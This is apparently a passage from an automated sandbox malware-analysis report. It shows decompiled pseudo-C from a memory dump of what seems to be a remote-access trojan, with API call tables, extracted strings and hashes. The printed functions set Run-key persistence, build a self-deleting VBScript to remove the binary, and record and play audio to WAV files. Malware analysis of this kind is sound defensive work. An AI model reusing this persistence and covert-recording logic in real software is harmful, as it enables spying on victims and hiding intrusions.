					_t103 = 0x30;
					L00401EDA( &_a4, 0x30, _t111, E004179B3( &_v28, 0x30, _t63));
					L00401ED0();
				}
				_t25 = E00402469();
				_t120 = _t25;
				if(_t25 == 0) {
					__eflags = PathFileExistsW(L00401ECB( &_a4));
					if(__eflags != 0) {
						goto L4;
					} else {
						E00402064(_t67, _t114 - 0x18, 0x45f6ac);
						_push(0xa8);
						L00404A6E(_t67, 0x46ca00, _t103, __eflags);
					}
				} else {
					_t60 = L00401ECB( &_a4);
					_t118 = _t114 - 0x18;
					E004020CC(_t67, _t118, _t103, _t120, _t109);
					E004173A6(_t60);
					_t114 = _t118 + 0x18;
					L4:
					_t28 = L00416C32( &_v124, _t67);
					_t108 = E00403010( &_v28, E00403086(_t67,  &_v76, L00409E6B( &_v100, L"open \"", _t120,  &_a4), _t109, _t120, L"\" type "), _t28);
					E00403086(_t67,  &_v52, _t32, _t109, _t120, L" alias audio");
					L00401ED0();
					L00401ED0();
					L00401ED0();
					L00401ED0();
					mciSendStringW(L00401ECB( &_v52), 0, 0, 0);
					mciSendStringA("play audio", 0, 0, 0);
					_t115 = _t114 - 0x18;
					E00402064(0, _t114 - 0x18, 0x45f6ac);
					_push(0xa9);
					L00404A6E(0, 0x46ca00, _t32, 0);
					_t43 = CreateEventA(0, 1, 0, 0);
					while(1) {
						L5:
						 *0x46bea8 = _t43;
						while(1) {
							_t122 = _t43;
							if(_t43 == 0) {
								break;
							}
							__eflags =  *0x46bea6; // 0x0
							if(__eflags != 0) {
								mciSendStringA("pause audio", 0, 0, 0);
								 *0x46bea6 = 0;
							}
							__eflags =  *0x46bea5; // 0x0
							if(__eflags != 0) {
								mciSendStringA("resume audio", 0, 0, 0);
								 *0x46bea5 = 0;
							}
							mciSendStringA("status audio mode",  &_v24, 0x14, 0);
							_t108 =  &_v24;
							_t110 = "stopped";
							_t89 = 0;
							while(1) {
								__eflags = ( *(_t108 + _t89) & 0x000000ff) -  *((intOrPtr*)(_t110 + _t89));
								if(( *(_t108 + _t89) & 0x000000ff) !=  *((intOrPtr*)(_t110 + _t89))) {
									break;
								}
								_t89 = _t89 + 1;
								__eflags = _t89 - 8;
								if(_t89 != 8) {
									continue;
								} else {
									SetEvent( *0x46bea8);
								}
								break;
							}
							__eflags = WaitForSingleObject( *0x46bea8, 0x1f4);
							if(__eflags != 0) {
								_t43 =  *0x46bea8; // 0x0
							} else {
								CloseHandle( *0x46bea8);
								_t43 = 0;
								goto L5;
							}
						}
						mciSendStringA("stop audio", 0, 0, 0);
						mciSendStringA("close audio", 0, 0, 0);
						E00402064(0, _t115 - 0x18, 0x45f6ac);
						_push(0xaa);
						L00404A6E(0, 0x46ca00, _t108, _t122);
						L00401ED0();
						goto L21;
					}
				}
				L21:
				return L00401ED0();
			}
























                              0x0041636b
                              0x00416375
                              0x00416377
                              0x00416385
                              0x0041638a
                              0x00416390
                              0x0041639f
                              0x004163a7
                              0x004163a7
                              0x004163ae
                              0x004163b6
                              0x004163b8
                              0x004164a5
                              0x004164a7
                              0x00000000
                              0x004164ad
                              0x004164b7
                              0x004164bc
                              0x004164c6
                              0x004164c6
                              0x004163be
                              0x004163be
                              0x004163c3
                              0x004163cb
                              0x004163d2
                              0x004163d7
                              0x004163da
                              0x004163e4
                              0x00416417
                              0x0041641c
                              0x00416425
                              0x0041642d
                              0x00416435
                              0x0041643d
                              0x00416450
                              0x00416464
                              0x00416466
                              0x00416470
                              0x00416475
                              0x0041647f
                              0x00416489
                              0x0041648f
                              0x0041648f
                              0x0041648f
                              0x00416560
                              0x00416560
                              0x00416562
                              0x00000000
                              0x00000000
                              0x004164d0
                              0x004164d6
                              0x004164e0
                              0x004164e2
                              0x004164e2
                              0x004164e8
                              0x004164ee
                              0x004164f8
                              0x004164fa
                              0x004164fa
                              0x0041650c
                              0x0041650e
                              0x00416511
                              0x00416516
                              0x00416518
                              0x0041651c
                              0x0041651f
                              0x00000000
                              0x00000000
                              0x00416521
                              0x00416522
                              0x00416525
                              0x00000000
                              0x00416527
                              0x0041652d
                              0x0041652d
                              0x00000000
                              0x00416525
                              0x00416544
                              0x00416546
                              0x0041655b
                              0x00416548
                              0x0041654e
                              0x00416554
                              0x00000000
                              0x00416554
                              0x00416546
                              0x00416570
                              0x0041657a
                              0x00416586
                              0x0041658b
                              0x00416595
                              0x0041659d
                              0x00000000
                              0x0041659d
                              0x0041648f
                              0x004165a2
                              0x004165b0

                              APIs
                              • mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 00416450
                              • mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 00416464
                              • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,0045F6AC), ref: 00416489
                              • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,?,00000000,0046C238), ref: 0041649F
                              • mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 004164E0
                              • mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 004164F8
                              • mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041650C
                              • SetEvent.KERNEL32 ref: 0041652D
                              • WaitForSingleObject.KERNEL32(000001F4), ref: 0041653E
                              • CloseHandle.KERNEL32 ref: 0041654E
                              • mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 00416570
                              • mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041657A
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: SendString$Event$CloseCreateExistsFileHandleObjectPathSingleWait
                              • String ID: alias audio$" type $close audio$open "$pause audio$play audio$resume audio$status audio mode$stop audio$stopped
                              • API String ID: 738084811-1354618412
                              • Opcode ID: 25cfce673dce31bed8baf2ba1d29a164df51879723e29213e1e10257fff3c748
                              • Instruction ID: c8fb6d8f14581896d3eba004d9fbc9f1a09e24d5ac4ccc55cdd35aae18883956
                              • Opcode Fuzzy Hash: 25cfce673dce31bed8baf2ba1d29a164df51879723e29213e1e10257fff3c748
                              • Instruction Fuzzy Hash: 4C51B4716002087AD714BB75DC96DFF3A6DDA50389F14003FF501A61E2EE788E8586AE
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040B107, Relevance: 35.3, APIs: 6, Strings: 14, Instructions: 259registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 98%
                              			E0040B107() {
				char _v28;
				char _v52;
				char _v76;
				char _v100;
				char _v124;
				char _v148;
				short _v668;
				void* _t49;
				void* _t50;
				void* _t53;
				void* _t56;
				void* _t82;
				void* _t84;
				void* _t85;
				signed char _t123;
				signed char _t124;
				void* _t227;
				void* _t229;
				void* _t230;
				void* _t231;

				L0040FB4B();
				if( *0x46a9d4 != 0x30) {
					L00409D75();
				}
				_t227 =  *0x46bd6b - 1; // 0x0
				if(_t227 == 0) {
					L00414D1D(_t227);
				}
				if( *0x46ba75 != 0) {
					E004170AC(L00401ECB(0x46c0e0));
				}
				_t214 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				_t229 =  *0x46bb06 - 1; // 0x0
				if(_t229 == 0) {
					E0041074C(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", L00401ECB(0x46c4e8));
				}
				_t230 =  *0x46baff - 1; // 0x0
				if(_t230 == 0) {
					E0041074C(0x80000002, _t214, L00401ECB(0x46c4e8));
				}
				_t231 =  *0x46bb04 - 1; // 0x0
				if(_t231 == 0) {
					E0041074C(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", L00401ECB(0x46c4e8));
				}
				E00431810(0,  &_v668, 0, 0x208);
				_t49 = E00402469();
				_t50 = L00401F75(0x46c560);
				_t53 = E00410420(L00401F75(0x46c518), "exepath",  &_v668, 0x208, _t50, _t49);
				_t232 = _t53;
				if(_t53 == 0) {
					GetModuleFileNameW(0,  &_v668, 0x208);
				}
				RegDeleteKeyA(0x80000001, L00401F75(0x46c518));
				_t56 = E004074E6(_t232);
				_t233 = _t56;
				if(_t56 != 0) {
					SetFileAttributesW(L00401ECB(0x46c530), 0x80);
				}
				_t123 =  ~(SetFileAttributesW( &_v668, 0x80));
				asm("sbb bl, bl");
				E00403086(_t123,  &_v148, L00416C32( &_v76, E004169EB( &_v28)), 0, _t233, L".vbs");
				L00401ED0();
				L00401FA7();
				E00404409(_t123,  &_v124, E00403086(_t123,  &_v28, E0040425F(_t123,  &_v76, E0043918F(_t123,  &_v28, _t233, L"Temp")), 0, _t233, "\\"), _t233,  &_v148);
				L00401ED0();
				L00401ED0();
				E004043E5(_t123,  &_v52, L"On Error Resume Next\n", _t233, E0040425F(_t123,  &_v28, L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n"));
				L00401ED0();
				_t124 = _t123 & 0x00000001;
				_t234 = _t124;
				if(_t124 != 0) {
					E004032F1(E00403086(_t124,  &_v28, E004043E5(_t124,  &_v76, L"while fso.FileExists(\"", _t234, E0040425F(_t124,  &_v100,  &_v668)), 0, _t234, L"\")\n"));
					L00401ED0();
					L00401ED0();
					L00401ED0();
				}
				E004032F1(E00403086(_t124,  &_v100, E00403086(_t124,  &_v28, E0040425F(_t124,  &_v76, L"fso.DeleteFile \""), 0, _t234,  &_v668), 0, _t234, L"\"\n"));
				L00401ED0();
				L00401ED0();
				L00401ED0();
				_t235 = _t124;
				if(_t124 != 0) {
					E0040766E(_t124,  &_v52, 0, L"wend\n");
				}
				_t82 = E004074E6(_t235);
				_t236 = _t82;
				if(_t82 != 0) {
					E004032F1(E00403086(0x45f714,  &_v100, L00409E6B( &_v28, L"fso.DeleteFolder \"", _t236, 0x46c530), 0, _t236, L"\"\n"));
					L00401ED0();
					L00401ED0();
				}
				E0040766E(0x45f714,  &_v52, 0, L"fso.DeleteFile(Wscript.ScriptFullName)");
				_t84 = L00401ECB( &_v124);
				_t85 = E00402469();
				if(E0041729F(L00401ECB( &_v52), _t85 + _t85, _t84, 0) != 0) {
					ShellExecuteW(0, L"open", L00401ECB( &_v124), 0x45f714, 0x45f714, 0);
				}
				ExitProcess(0);
			}























                              0x0040b113
                              0x0040b11f
                              0x0040b121
                              0x0040b121
                              0x0040b129
                              0x0040b12f
                              0x0040b131
                              0x0040b131
                              0x0040b13d
                              0x0040b14b
                              0x0040b14b
                              0x0040b155
                              0x0040b15a
                              0x0040b160
                              0x0040b171
                              0x0040b176
                              0x0040b177
                              0x0040b17d
                              0x0040b18e
                              0x0040b193
                              0x0040b194
                              0x0040b19a
                              0x0040b1ae
                              0x0040b1b3
                              0x0040b1c4
                              0x0040b1d3
                              0x0040b1db
                              0x0040b1fc
                              0x0040b204
                              0x0040b206
                              0x0040b211
                              0x0040b211
                              0x0040b224
                              0x0040b236
                              0x0040b241
                              0x0040b243
                              0x0040b252
                              0x0040b252
                              0x0040b267
                              0x0040b26e
                              0x0040b287
                              0x0040b290
                              0x0040b298
                              0x0040b2cd
                              0x0040b2d6
                              0x0040b2de
                              0x0040b2f9
                              0x0040b302
                              0x0040b307
                              0x0040b307
                              0x0040b30a
                              0x0040b33e
                              0x0040b346
                              0x0040b34e
                              0x0040b356
                              0x0040b356
                              0x0040b38e
                              0x0040b396
                              0x0040b39e
                              0x0040b3a6
                              0x0040b3ab
                              0x0040b3ad
                              0x0040b3b7
                              0x0040b3b7
                              0x0040b3ca
                              0x0040b3cf
                              0x0040b3d1
                              0x0040b3f6
                              0x0040b3fe
                              0x0040b406
                              0x0040b406
                              0x0040b413
                              0x0040b41c
                              0x0040b425
                              0x0040b443
                              0x0040b457
                              0x0040b457
                              0x0040b45e

                              APIs
                                • Part of subcall function 0040FB4B: TerminateProcess.KERNEL32(00000000,?,0040B118), ref: 0040FB5B
                                • Part of subcall function 0040FB4B: WaitForSingleObject.KERNEL32(000000FF,?,0040B118), ref: 0040FB6E
                              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040B211
                              • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040B224
                              • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 0040B252
                              • SetFileAttributesW.KERNEL32(?,00000080), ref: 0040B260
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(0040884D,00000000,?,0040B126), ref: 00409D84
                                • Part of subcall function 00409D75: UnhookWindowsHookEx.USER32(00000000), ref: 00409D94
                                • Part of subcall function 00409D75: TerminateThread.KERNEL32(Function_00008832,00000000,?,0040B126), ref: 00409DA6
                              • ShellExecuteW.SHELL32(00000000,open,00000000,0045F714,0045F714,00000000), ref: 0040B457
                              • ExitProcess.KERNEL32 ref: 0040B45E
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: FileTerminate$AttributesProcessThread$DeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                              • String ID: ")$.vbs$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                              • API String ID: 3659626935-2802769051
                              • Opcode ID: 847bee91743045f3007174e1e95ac693254bb67ba72c4d55a7afc5f21e8df2f8
                              • Instruction ID: 1fdbb4419d14362d38d1ed4744bf8d6dc0aba1f6708a8cbb9b41b7a1a16d8b70
                              • Opcode Fuzzy Hash: 847bee91743045f3007174e1e95ac693254bb67ba72c4d55a7afc5f21e8df2f8
                              • Instruction Fuzzy Hash: 86819D31A101086ACB14F7A2DCA69EF77699F50748F14003FF506772E2EE785E8A869D
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401A44, Relevance: 35.2, APIs: 16, Strings: 4, Instructions: 155fileCOMMON
                              Download Yara Rule
                              C-Code - Quality: 95%
                              			E00401A44(WCHAR* __ecx, signed int __edx) {
				long _v8;
				void _v12;
				void _v16;
				void _v20;
				void _v24;
				void _v28;
				void _v32;
				signed int _t36;
				void** _t75;
				signed int _t80;
				void* _t81;
				signed int _t83;

				_t75 = __edx;
				_t80 =  *0x46ba9a & 0x0000ffff;
				_t83 = ( *0x46baa6 & 0x0000ffff) * _t80;
				_v20 = 1;
				_v16 = 0x10;
				_v24 = _t83 *  *0x46ba9c >> 3;
				asm("cdq");
				_v28 = _t83 + (__edx & 0x00000007) >> 3;
				_t36 =  *(__edx + 4) * _t80;
				_v32 = _t36;
				_v12 = _t36 + 0x24;
				_t81 = CreateFileW(__ecx, 0x40000000, 0, 0, 2, 0x80, 0);
				if(_t81 != 0xffffffff) {
					WriteFile(_t81, "RIFF", 4,  &_v8, 0);
					WriteFile(_t81,  &_v12, 4,  &_v8, 0);
					WriteFile(_t81, "WAVE", 4,  &_v8, 0);
					WriteFile(_t81, "fmt ", 4,  &_v8, 0);
					WriteFile(_t81,  &_v16, 4,  &_v8, 0);
					WriteFile(_t81,  &_v20, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9a, 2,  &_v8, 0);
					WriteFile(_t81, 0x46ba9c, 4,  &_v8, 0);
					WriteFile(_t81,  &_v24, 4,  &_v8, 0);
					WriteFile(_t81,  &_v28, 2,  &_v8, 0);
					WriteFile(_t81, 0x46baa6, 2,  &_v8, 0);
					WriteFile(_t81, "data", 4,  &_v8, 0);
					WriteFile(_t81,  &_v32, 4,  &_v8, 0);
					WriteFile(_t81,  *_t75, _t75[1],  &_v8, 0);
					CloseHandle(_t81);
					return 1;
				}
				return 0;
			}















                              0x00401a53
                              0x00401a56
                              0x00401a5d
                              0x00401a60
                              0x00401a67
                              0x00401a7a
                              0x00401a7f
                              0x00401a90
                              0x00401a98
                              0x00401aa3
                              0x00401aa9
                              0x00401ab2
                              0x00401ab7
                              0x00401ad3
                              0x00401ae2
                              0x00401af2
                              0x00401b02
                              0x00401b11
                              0x00401b20
                              0x00401b30
                              0x00401b40
                              0x00401b4f
                              0x00401b5e
                              0x00401b6e
                              0x00401b7e
                              0x00401b8d
                              0x00401b9b
                              0x00401b9e
                              0x00000000
                              0x00401ba4
                              0x00000000

                              APIs
                              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AAC
                              • WriteFile.KERNEL32(00000000,RIFF,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AD3
                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AE2
                              • WriteFile.KERNEL32(00000000,WAVE,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401AF2
                              • WriteFile.KERNEL32(00000000,fmt ,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B02
                              • WriteFile.KERNEL32(00000000,00000010,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B11
                              • WriteFile.KERNEL32(00000000,00000001,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B20
                              • WriteFile.KERNEL32(00000000,0046BA9A,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B30
                              • WriteFile.KERNEL32(00000000,0046BA9C,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B40
                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B4F
                              • WriteFile.KERNEL32(00000000,?,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B5E
                              • WriteFile.KERNEL32(00000000,0046BAA6,00000002,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B6E
                              • WriteFile.KERNEL32(00000000,data,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B7E
                              • WriteFile.KERNEL32(00000000,?,00000004,?,00000000,?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00401B8D
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: File$Write$Create
                              • String ID: RIFF$WAVE$data$fmt
                              • API String ID: 1602526932-4212202414
                              • Opcode ID: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
                              • Instruction ID: b5e00df74bb3e46237e128d7157f8ec2d4ab39d7b9d0c44a05e459c2c922e607
                              • Opcode Fuzzy Hash: 422b5d87e93fc4075c6ec35830616d194da27f1ddb5db7f37ea2b3f51acf71b2
                              • Instruction Fuzzy Hash: B8413EB5A50218BAE710DA91CC86FFF7BBCDB45B50F500066F704EA0C0D7B45A05DBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0044625D, Relevance: 27.4, APIs: 18, Instructions: 419COMMON
                              Download Yara Rule
                              C-Code - Quality: 87%
                              			E0044625D(signed int _a4, signed int _a8) {
				signed int _v0;
				signed char _v5;
				intOrPtr _v8;
				signed char _v9;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				signed int _v92;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t116;
				signed int _t119;
				signed int _t120;
				signed int _t122;
				signed int _t123;
				signed int _t126;
				signed int _t127;
				signed int _t131;
				signed int _t133;
				signed int _t136;
				signed int _t138;
				signed int _t139;
				signed int _t142;
				void* _t143;
				signed int _t148;
				signed int* _t150;
				signed int* _t156;
				signed int _t163;
				signed int _t165;
				signed int _t167;
				intOrPtr _t168;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t180;
				signed int _t185;
				intOrPtr* _t186;
				signed int _t191;
				signed int _t196;
				signed int _t197;
				signed int _t204;
				intOrPtr* _t205;
				signed int _t214;
				signed int _t215;
				signed int _t217;
				signed int _t218;
				signed int _t220;
				signed int _t221;
				signed int _t223;
				intOrPtr _t225;
				void* _t231;
				signed int _t233;
				void* _t236;
				signed int _t237;
				signed int _t238;
				void* _t241;
				signed int _t244;
				signed int _t246;
				void* _t252;
				signed int _t253;
				signed int _t254;
				void* _t260;
				void* _t262;
				signed int _t263;
				intOrPtr* _t267;
				intOrPtr* _t271;
				signed int _t274;
				signed int _t276;
				signed int _t280;
				signed int _t282;
				void* _t283;
				void* _t284;
				void* _t285;
				signed int _t286;
				signed int _t288;
				signed int _t290;
				signed int _t291;
				signed int* _t292;
				signed int _t298;
				signed int _t299;
				CHAR* _t300;
				signed int _t302;
				signed int _t303;
				WCHAR* _t304;
				signed int _t305;
				signed int _t306;
				signed int* _t307;
				signed int _t308;
				signed int _t310;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t321;
				void* _t322;
				void* _t323;

				_t217 = _a4;
				if(_t217 != 0) {
					_t286 = _t217;
					_t116 = E00434870(_t217, 0x3d);
					_v16 = _t116;
					_t231 = _t285;
					__eflags = _t116;
					if(_t116 == 0) {
						L10:
						 *((intOrPtr*)(L00439E14())) = 0x16;
						goto L11;
					} else {
						__eflags = _t116 - _t217;
						if(_t116 == _t217) {
							goto L10;
						} else {
							__eflags =  *((char*)(_t116 + 1));
							_t298 =  *0x46b4d0; // 0x3179e90
							_t120 = _t116 & 0xffffff00 |  *((char*)(_t116 + 1)) == 0x00000000;
							_v5 = _t120;
							__eflags = _t298 -  *0x46b4dc; // 0x3179e90
							if(__eflags == 0) {
								L87();
								_t298 = _t120;
								_t120 = _v5;
								_t231 = _t298;
								 *0x46b4d0 = _t298;
							}
							_t218 = 0;
							__eflags = _t298;
							if(_t298 != 0) {
								L21:
								_t233 = _t286;
								_t122 = _v16 - _t233;
								_push(_t122);
								_push(_t233);
								L121();
								_v12 = _t122;
								__eflags = _t122;
								if(_t122 < 0) {
									L29:
									__eflags = _v5 - _t218;
									if(_v5 != _t218) {
										goto L12;
									} else {
										_t123 =  ~_t122;
										_v12 = _t123;
										_t27 = _t123 + 2; // 0x2
										_t236 = _t27;
										__eflags = _t236 - _t123;
										if(_t236 < _t123) {
											goto L11;
										} else {
											__eflags = _t236 - 0x3fffffff;
											if(_t236 >= 0x3fffffff) {
												goto L11;
											} else {
												_push(4);
												_push(_t236);
												_t299 = E00446905(_t298);
												L0043EE85(_t218);
												_t320 = _t320 + 0x10;
												__eflags = _t299;
												if(_t299 == 0) {
													goto L11;
												} else {
													_t237 = _v12;
													_t286 = _t218;
													_t126 = _a4;
													 *(_t299 + _t237 * 4) = _t126;
													 *(_t299 + 4 + _t237 * 4) = _t218;
													goto L34;
												}
											}
										}
									}
								} else {
									__eflags =  *_t298 - _t218;
									if( *_t298 == _t218) {
										goto L29;
									} else {
										L0043EE85( *((intOrPtr*)(_t298 + _t122 * 4)));
										_t282 = _v12;
										__eflags = _v5 - _t218;
										if(_v5 != _t218) {
											while(1) {
												__eflags =  *(_t298 + _t282 * 4) - _t218;
												if( *(_t298 + _t282 * 4) == _t218) {
													break;
												}
												 *(_t298 + _t282 * 4) =  *(_t298 + 4 + _t282 * 4);
												_t282 = _t282 + 1;
												__eflags = _t282;
											}
											_push(4);
											_push(_t282);
											_t299 = E00446905(_t298);
											L0043EE85(_t218);
											_t320 = _t320 + 0x10;
											_t126 = _t286;
											__eflags = _t299;
											if(_t299 != 0) {
												L34:
												 *0x46b4d0 = _t299;
											}
										} else {
											_t126 = _a4;
											_t286 = _t218;
											 *(_t298 + _t282 * 4) = _t126;
										}
										__eflags = _a8 - _t218;
										if(_a8 == _t218) {
											goto L12;
										} else {
											_t238 = _t126;
											_t283 = _t238 + 1;
											do {
												_t127 =  *_t238;
												_t238 = _t238 + 1;
												__eflags = _t127;
											} while (_t127 != 0);
											_v12 = _t238 - _t283 + 2;
											_t300 = L0043DFD9(_t238 - _t283, _t238 - _t283 + 2, 1);
											_pop(_t241);
											__eflags = _t300;
											if(_t300 == 0) {
												L42:
												L0043EE85(_t300);
												goto L12;
											} else {
												_t131 = E004405A6(_t300, _v12, _a4);
												_t321 = _t320 + 0xc;
												__eflags = _t131;
												if(_t131 != 0) {
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													_push(_t218);
													E0043629A();
													asm("int3");
													_t316 = _t321;
													_t322 = _t321 - 0xc;
													_push(_t218);
													_t220 = _v44;
													__eflags = _t220;
													if(_t220 != 0) {
														_push(_t300);
														_push(_t286);
														_push(0x3d);
														_t288 = _t220;
														_t133 = E00450867(_t241);
														_v20 = _t133;
														_t244 = _t220;
														__eflags = _t133;
														if(_t133 == 0) {
															L54:
															 *((intOrPtr*)(L00439E14())) = 0x16;
															goto L55;
														} else {
															__eflags = _t133 - _t220;
															if(_t133 == _t220) {
																goto L54;
															} else {
																_t302 =  *0x46b4d4; // 0x0
																_t221 = 0;
																__eflags =  *(_t133 + 2);
																_t246 = _t244 & 0xffffff00 |  *(_t133 + 2) == 0x00000000;
																_v9 = _t246;
																__eflags = _t302 -  *0x46b4d8; // 0x0
																if(__eflags == 0) {
																	_push(_t302);
																	L104();
																	_t246 = _v9;
																	_t302 = _t133;
																	 *0x46b4d4 = _t302;
																}
																__eflags = _t302;
																if(_t302 != 0) {
																	L64:
																	_v20 = _v20 - _t288 >> 1;
																	_t138 = E00446898(_t288, _v20 - _t288 >> 1);
																	_v16 = _t138;
																	__eflags = _t138;
																	if(_t138 < 0) {
																		L72:
																		__eflags = _v9 - _t221;
																		if(_v9 != _t221) {
																			goto L56;
																		} else {
																			_t139 =  ~_t138;
																			_v16 = _t139;
																			_t72 = _t139 + 2; // 0x2
																			_t252 = _t72;
																			__eflags = _t252 - _t139;
																			if(_t252 < _t139) {
																				goto L55;
																			} else {
																				__eflags = _t252 - 0x3fffffff;
																				if(_t252 >= 0x3fffffff) {
																					goto L55;
																				} else {
																					_push(4);
																					_push(_t252);
																					_t303 = E00446905(_t302);
																					L0043EE85(_t221);
																					_t322 = _t322 + 0x10;
																					__eflags = _t303;
																					if(_t303 == 0) {
																						goto L55;
																					} else {
																						_t253 = _v16;
																						_t288 = _t221;
																						_t142 = _v0;
																						 *(_t303 + _t253 * 4) = _t142;
																						 *(_t303 + 4 + _t253 * 4) = _t221;
																						goto L77;
																					}
																				}
																			}
																		}
																	} else {
																		__eflags =  *_t302 - _t221;
																		if( *_t302 == _t221) {
																			goto L72;
																		} else {
																			L0043EE85( *((intOrPtr*)(_t302 + _t138 * 4)));
																			_t276 = _v16;
																			__eflags = _v9 - _t221;
																			if(_v9 != _t221) {
																				while(1) {
																					__eflags =  *(_t302 + _t276 * 4) - _t221;
																					if( *(_t302 + _t276 * 4) == _t221) {
																						break;
																					}
																					 *(_t302 + _t276 * 4) =  *(_t302 + 4 + _t276 * 4);
																					_t276 = _t276 + 1;
																					__eflags = _t276;
																				}
																				_push(4);
																				_push(_t276);
																				_t303 = E00446905(_t302);
																				L0043EE85(_t221);
																				_t322 = _t322 + 0x10;
																				_t142 = _t288;
																				__eflags = _t303;
																				if(_t303 != 0) {
																					L77:
																					 *0x46b4d4 = _t303;
																				}
																			} else {
																				_t142 = _v0;
																				_t288 = _t221;
																				 *(_t302 + _t276 * 4) = _t142;
																			}
																			__eflags = _a4 - _t221;
																			if(_a4 == _t221) {
																				goto L56;
																			} else {
																				_t254 = _t142;
																				_t81 = _t254 + 2; // 0x2
																				_t284 = _t81;
																				do {
																					_t143 =  *_t254;
																					_t254 = _t254 + 2;
																					__eflags = _t143 - _t221;
																				} while (_t143 != _t221);
																				_t82 = (_t254 - _t284 >> 1) + 2; // 0x0
																				_v16 = _t82;
																				_t304 = L0043DFD9(_t254 - _t284 >> 1, _t82, 2);
																				_pop(_t258);
																				__eflags = _t304;
																				if(_t304 == 0) {
																					L85:
																					L0043EE85(_t304);
																					goto L56;
																				} else {
																					_t148 = E00440264(_t304, _v16, _v0);
																					_t323 = _t322 + 0xc;
																					__eflags = _t148;
																					if(_t148 != 0) {
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						_push(_t221);
																						E0043629A();
																						asm("int3");
																						_push(_t316);
																						_t317 = _t323;
																						_push(_t288);
																						_t290 = _v92;
																						__eflags = _t290;
																						if(_t290 != 0) {
																							_t260 = 0;
																							_t150 = _t290;
																							__eflags =  *_t290;
																							if( *_t290 != 0) {
																								do {
																									_t150 =  &(_t150[1]);
																									_t260 = _t260 + 1;
																									__eflags =  *_t150;
																								} while ( *_t150 != 0);
																							}
																							_t93 = _t260 + 1; // 0x2
																							_t305 = L0043DFD9(_t260, _t93, 4);
																							_t262 = _t304;
																							__eflags = _t305;
																							if(_t305 == 0) {
																								L102:
																								E0043E5DA(_t221, _t284, _t290, _t305);
																								goto L103;
																							} else {
																								__eflags =  *_t290;
																								if( *_t290 == 0) {
																									L100:
																									L0043EE85(0);
																									_t175 = _t305;
																									goto L101;
																								} else {
																									_push(_t221);
																									_t221 = _t305 - _t290;
																									__eflags = _t221;
																									do {
																										_t271 =  *_t290;
																										_t94 = _t271 + 1; // 0x5
																										_t284 = _t94;
																										do {
																											_t176 =  *_t271;
																											_t271 = _t271 + 1;
																											__eflags = _t176;
																										} while (_t176 != 0);
																										_t262 = _t271 - _t284;
																										_t95 = _t262 + 1; // 0x6
